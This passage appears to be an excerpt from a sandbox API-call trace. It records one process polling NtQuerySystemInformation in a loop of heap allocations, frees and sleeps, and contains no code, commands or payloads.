lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.566] Sleep (dwMilliseconds=0x110) [0234.599] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.599] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.600] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.600] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.600] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.601] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.601] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.601] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.602] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.602] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.602] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.602] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.602] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.603] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.603] Sleep (dwMilliseconds=0x110) [0234.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.613] Sleep (dwMilliseconds=0x110) [0234.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.623] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.625] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.626] Sleep (dwMilliseconds=0x110) [0234.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.644] Sleep (dwMilliseconds=0x110) [0234.694] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.695] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.695] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.695] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.695] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.696] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.702] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.704] Sleep (dwMilliseconds=0x110) [0234.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.719] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.720] Sleep (dwMilliseconds=0x110) [0234.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.735] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.737] Sleep (dwMilliseconds=0x110) [0234.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.750] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.754] Sleep (dwMilliseconds=0x110) [0234.762] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.763] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.763] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.763] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.763] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.764] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.764] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.764] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.764] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.766] Sleep (dwMilliseconds=0x110) [0234.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.832] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.832] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.833] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.833] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.833] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.833] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.833] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.833] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.834] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.834] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.834] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.834] Sleep (dwMilliseconds=0x110) [0234.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.893] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.893] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.894] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.894] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.895] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.895] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.895] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.895] Sleep (dwMilliseconds=0x110) [0234.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0234.954] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0234.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0234.956] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0234.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0234.956] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0234.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.957] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0234.958] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0234.958] Sleep (dwMilliseconds=0x110) [0235.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.020] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0235.021] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.021] Sleep (dwMilliseconds=0x110) [0235.115] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0235.115] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.121] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.121] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0235.121] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.122] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.125] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0235.125] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0235.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0235.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0235.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0235.134] HeapFree (in: 